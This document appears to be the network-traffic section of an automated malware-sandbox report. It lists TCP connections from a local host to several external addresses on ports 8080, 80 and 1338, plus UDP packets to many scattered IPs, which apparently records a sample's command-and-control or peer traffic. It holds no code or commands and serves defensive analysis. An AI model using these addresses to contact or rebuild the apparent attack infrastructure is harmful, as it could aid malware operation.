                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.780811071 CEST625128080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.785761118 CEST808062512190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:10.778944969 CEST625128080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.035934925 CEST6251080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.036371946 CEST6251380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.041665077 CEST8062513185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.041769028 CEST6251380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.041979074 CEST8062510185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.041985035 CEST6251380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.042037964 CEST6251080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.046941042 CEST8062513185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.134852886 CEST8062513185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.134888887 CEST8062513185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.134905100 CEST8062513185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.134927988 CEST6251380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.134962082 CEST6251380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.135001898 CEST8062513185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.135072947 CEST6251380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.162030935 CEST625148080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.166982889 CEST808062514190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.167114019 CEST625148080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.170757055 CEST625148080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.175584078 CEST808062514190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:14.710068941 CEST133862511189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:14.710248947 CEST625111338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:14.710664034 CEST625111338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:14.711659908 CEST625151338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:14.715492964 CEST133862511189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:14.716573000 CEST133862515189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:14.716808081 CEST625151338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.194612980 CEST625148080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.437671900 CEST6251380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.438035965 CEST6251680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.443011999 CEST8062516185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.443106890 CEST8062513185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.443191051 CEST6251380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.443202019 CEST6251680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.443428040 CEST6251680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.448219061 CEST8062516185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525407076 CEST8062516185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525459051 CEST8062516185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525495052 CEST8062516185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525520086 CEST6251680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525520086 CEST6251680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.525557995 CEST6251680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.562113047 CEST625178080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.567184925 CEST808062517190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.567745924 CEST625178080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.567866087 CEST625178080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:17.572649002 CEST808062517190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.577260017 CEST625178080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.816313028 CEST6251680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.816895008 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.821922064 CEST8062518185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.821980000 CEST8062516185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.822057962 CEST6251680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.822066069 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.822299004 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:21.827138901 CEST8062518185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899507046 CEST8062518185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899549007 CEST8062518185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899584055 CEST8062518185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899604082 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899657011 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899657011 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899880886 CEST8062518185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.899929047 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.914141893 CEST625198080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.919094086 CEST808062519190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.919245005 CEST625198080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.919814110 CEST625198080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:22.924664021 CEST808062519190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:23.210630894 CEST133862515189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:23.210767031 CEST625151338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:23.211251020 CEST625151338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:23.212291956 CEST625201338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:23.216144085 CEST133862515189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:23.217397928 CEST133862520189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:23.217480898 CEST625201338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:26.962882996 CEST625198080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.219115973 CEST6252180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.219144106 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.224967957 CEST8062521185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.225110054 CEST6252180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.225579977 CEST8062518185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.225660086 CEST6251880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.229074955 CEST6252180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:27.234107018 CEST8062521185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:28.305110931 CEST8062521185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:28.305144072 CEST8062521185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:28.305160999 CEST8062521185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:28.305191994 CEST6252180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:28.305238962 CEST6252180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:28.330524921 CEST625228080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:28.335300922 CEST808062522190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:28.335371017 CEST625228080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:28.339416981 CEST625228080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:28.344232082 CEST808062522190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:31.700592995 CEST133862520189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:31.700697899 CEST625201338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:31.701323986 CEST625201338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:31.702238083 CEST625231338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:31.706166983 CEST133862520189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:31.707134008 CEST133862523189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:31.710190058 CEST625231338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:32.388529062 CEST625228080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:32.651778936 CEST6252180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:32.652982950 CEST6252480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:32.657217026 CEST8062521185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:32.657430887 CEST6252180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:32.657896996 CEST8062524185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:32.663108110 CEST6252480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:32.683916092 CEST6252480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:32.689095020 CEST8062524185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.728588104 CEST8062524185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.728702068 CEST6252480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.728744984 CEST8062524185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.728761911 CEST8062524185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.728775978 CEST8062524185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.728801966 CEST6252480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.728956938 CEST6252480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.745547056 CEST625258080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.750359058 CEST808062525190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.750459909 CEST625258080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.750663996 CEST625258080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:33.755469084 CEST808062525190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:37.753556013 CEST625258080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:37.976325989 CEST6252480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:37.976711035 CEST6252680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:38.150250912 CEST8062526185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:38.150290012 CEST8062524185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:38.150338888 CEST6252680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:38.150377035 CEST6252480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:38.152611017 CEST6252680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:38.157398939 CEST8062526185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.248230934 CEST8062526185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.248302937 CEST8062526185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.248321056 CEST6252680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.248338938 CEST8062526185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.248351097 CEST6252680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.248387098 CEST6252680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.248414993 CEST8062526185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.248478889 CEST6252680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.276220083 CEST625278080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.281336069 CEST808062527190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.281423092 CEST625278080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.281799078 CEST625278080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:39.286619902 CEST808062527190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:40.253004074 CEST133862523189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:40.255089045 CEST625231338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:40.255472898 CEST625231338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:40.261025906 CEST133862523189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:42.046344995 CEST6252680192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:42.049055099 CEST625278080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:44.087147951 CEST6252880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:44.092153072 CEST8062528185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:44.093470097 CEST6252880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:44.093604088 CEST6252880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:44.098472118 CEST8062528185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.318846941 CEST8062528185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.318934917 CEST6252880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.318953991 CEST8062528185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.318989992 CEST8062528185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.319010019 CEST6252880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.319067955 CEST8062528185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.319119930 CEST6252880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.319120884 CEST6252880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.319226980 CEST8062528185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.319277048 CEST6252880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.452831984 CEST625298080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.457942009 CEST808062529190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.458084106 CEST625298080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.458210945 CEST625298080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:45.463047028 CEST808062529190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:53.953672886 CEST808062529190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:53.953751087 CEST625298080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:53.954643965 CEST625298080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:53.959470987 CEST808062529190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:54.238342047 CEST6252880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:54.238711119 CEST6253080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:54.243540049 CEST8062528185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:54.243556023 CEST8062530185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:54.243628025 CEST6252880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:54.243633986 CEST6253080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:54.243789911 CEST6253080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:54.248606920 CEST8062530185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.329929113 CEST8062530185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.330001116 CEST8062530185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.330024004 CEST6253080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.330038071 CEST8062530185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.330070972 CEST8062530185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.330085993 CEST6253080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.330121040 CEST6253080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.383454084 CEST625318080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.388550997 CEST808062531190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.388631105 CEST625318080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.388773918 CEST625318080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:55.393743992 CEST808062531190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:03.870992899 CEST808062531190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:03.871176958 CEST625318080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:03.871366978 CEST625318080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:03.876517057 CEST808062531190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:04.093595028 CEST6253080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:04.094058990 CEST6253280192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:04.099328041 CEST8062532185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:04.099342108 CEST8062530185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:04.099436045 CEST6253080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:04.099467039 CEST6253280192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:04.099690914 CEST6253280192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:04.104513884 CEST8062532185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184223890 CEST8062532185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184310913 CEST8062532185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184314966 CEST6253280192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184323072 CEST8062532185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184398890 CEST6253280192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184398890 CEST6253280192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184442043 CEST8062532185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.184485912 CEST6253280192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.197354078 CEST625338080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.202326059 CEST808062533190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.202590942 CEST625338080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.202590942 CEST625338080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:05.207530022 CEST808062533190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.679056883 CEST808062533190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.679121971 CEST625338080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.679286957 CEST625338080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.684165955 CEST808062533190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.905960083 CEST6253280192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.906263113 CEST6253480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.911150932 CEST8062534185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.911232948 CEST6253480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.911405087 CEST6253480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.911659956 CEST8062532185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.911710978 CEST6253280192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:13.916299105 CEST8062534185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.013777018 CEST8062534185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.013797045 CEST8062534185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.013926029 CEST8062534185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.014966965 CEST6253480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.032229900 CEST625358080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.037246943 CEST808062535190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.037354946 CEST625358080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.037476063 CEST625358080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:15.042419910 CEST808062535190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:23.536933899 CEST808062535190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:23.537013054 CEST625358080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:30.135622978 CEST8062534185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:30.135721922 CEST6253480192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:40.299529076 CEST625358080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:40:40.313899040 CEST808062535190.120.227.91192.168.2.7

                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:13.914680004 CEST597861473192.168.2.794.76.206.19
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:14.436834097 CEST597875683192.168.2.746.45.148.196
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:15.100198984 CEST597885750192.168.2.783.222.184.130
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:15.790875912 CEST597895010192.168.2.758.140.114.152
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:15.860819101 CEST4997453192.168.2.71.1.1.1
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:15.949084044 CEST53499741.1.1.1192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:16.268845081 CEST499754630192.168.2.780.178.242.19
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:16.795880079 CEST499766800192.168.2.761.95.152.112
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:17.313047886 CEST499777066192.168.2.7220.94.117.230
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:17.831371069 CEST499784840192.168.2.758.85.93.82
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:29.050771952 CEST500374876192.168.2.7195.42.129.188
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:29.566015959 CEST500389674192.168.2.781.180.90.149
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:30.108300924 CEST649588112192.168.2.7113.190.137.239
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:30.892754078 CEST649594375192.168.2.789.45.97.101
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:31.406265020 CEST649604882192.168.2.7203.110.84.90
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:31.928888083 CEST649616989192.168.2.7121.243.130.85
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.438146114 CEST649626219192.168.2.7124.123.112.184
